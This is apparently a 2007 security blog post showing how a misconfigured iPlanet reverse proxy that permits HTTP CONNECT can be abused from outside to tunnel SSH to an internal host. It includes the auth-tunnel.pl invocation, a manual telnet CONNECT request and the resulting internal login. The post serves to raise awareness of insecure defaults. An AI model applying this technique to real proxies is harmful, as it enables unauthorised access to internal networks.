Using proxies to break into the office
It's amazing to me that software still comes out of the box insecure. My rant today focuses around the HTTP CONNECT method, and how to take advantage of a number of mis-configured proxy servers to get into servers behind the network from the outside.
HTTP CONNECT ( was designed to create a TCP connection that bypasses the normal application layer for proxy services. Its often used today in tunneling HTTPS (or if you read my blog SSH) connections through a standard HTTP proxy.
You can review more detailed info here: http://www.ietf.org/rfc/rfc2616.txt
So lets get started. We will be using auth-tunnel.pl again for this work, we have a fairly strait forward setup of Iplanet proxy server, setup in reverse mode per the Sun Documentation.
What we will do is connect to a proxy server using HTTP CONNECT from the outside, then establish a connection to another server on the network on port 22. We can then tunnel the traffic to ssh in from our local machine. In my setup my proxy server required Authorization, making a bit more secure :).
Tell auth tunnel the proxy server and port, the local port to tunnel, the remote ssh server then all the authentication information!
[mjohnson@shell auth-tunnel]$ ./auth-tunnel.pl -p proxytest.xyphoid.com:80 -l 7575 -r mysshserver:22 -a admin:mypassword -u mytestagent &
[1] 28208
[mjohnson@shell auth-tunnel]$ MD5 Avail. Enabling support for Digest Authentication
[mjohnson@shell auth-tunnel]$ ssh 127.0.0.1 -p 7575
Proxy authentication required...Closed proxy.
Reconnecting...using BASIC authentication.
Proxy-Authorization: Basic realm="Private Area" YWRtaW46bXlwYXNzd29yZA==
Auth tunnel establishes a connection using HTTP CONNECT to mysshserver which is only know about from the proxytest server. Its not externally accessible. Once the connection is established we can just use a standard ssh client to connect to that server.
[mjohnson@shell auth-tunnel]$ ssh 127.0.0.1 -p 7575
Proxy authentication required...Closed proxy.
Reconnecting...using BASIC authentication.
login as: mjohnson
mjohnson@mysshserver's password:
Last login: Fri Jun 22 00:49:52 2007 from 127.0.0.1
[mjohnson@mysshserver ~]$
Below is the info on the version of software I am running and what it would look like doing manually.
[mjohnson@shell auth-tunnel]$ telnet proxytest.xyphoid.com 80
Connected to proxytest.xyphoid.com.
Escape character is '^]'.
CONNECT mysshserver:22 HTTP/1.0
User-Agent: myuseragent 1.0
Proxy-Authorization: Basic realm="Private Area"
HTTP/1.1 407 Proxy authorization required
Proxy-agent: iPlanet-Web-Proxy-Server/3.6-SP7
Date: Fri, 22 Jun 2007 00:52:46
Proxy-authenticate: basic realm="Private Area"
Connection: close
Content-type: text/html
Content-length: 271
This is just one way we can get to a server using HTTP CONNECT from the outside. I hope going forward vendors start making this more secure out of the box or people becoming aware.
Read more!
